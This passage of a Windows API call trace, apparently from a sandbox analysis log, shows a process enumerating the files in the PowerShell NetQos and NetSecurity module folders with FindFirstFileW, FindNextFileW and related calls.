ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetQosPolicy.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.120] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos.psd1", cAlternateFileName="")) returned 1 [0265.120] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos.psd1", cAlternateFileName="")) returned 0 [0265.120] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.120] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\NetQos.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos\\netqos.psd1")) returned 0x20 [0265.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.121] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e [0265.121] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\", lpFilePart=0x0) returned 0x3f [0265.121] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.121] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.122] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0265.122] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.Firewall.Commands.dll", cAlternateFileName="")) returned 1 [0265.122] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf01, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallAddressFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.122] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xca0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallApplicationFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.122] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbe5, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallInterfaceFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.122] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.123] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1300, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallPortFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.123] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2077, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallProfile.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.123] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a32, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.123] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallSecurityFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.123] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallServiceFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.124] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallSetting.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.124] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x75d, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetGPO.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.124] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f27, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecDospSetting.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.124] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecIdentity.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.124] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x32ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.124] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4162, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.125] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x825, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeSA.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.125] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2d50, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPhase1AuthSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.125] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPhase2AuthSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.125] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPolicyChange.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.125] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e77, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.126] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecQuickModeSA.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.126] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x994b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.126] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20fee, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.formats.ps1xml", cAlternateFileName="")) returned 1 [0265.126] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.psd1", cAlternateFileName="")) returned 1 [0265.126] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12106, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.types.ps1xml", cAlternateFileName="")) returned 1 [0265.126] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12106, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.types.ps1xml", cAlternateFileName="")) returned 0 [0265.127] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.127] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e [0265.127] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\", lpFilePart=0x0) returned 0x3f [0265.127] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db140 [0265.127] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.127] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0265.128] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.Firewall.Commands.dll", cAlternateFileName="")) returned 1 [0265.128] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf01, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallAddressFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.128] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xca0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallApplicationFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.128] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbe5, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallInterfaceFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.128] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.128] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1300, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallPortFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.128] FindNextFileW (in: hFindFile=0x1a8db140, 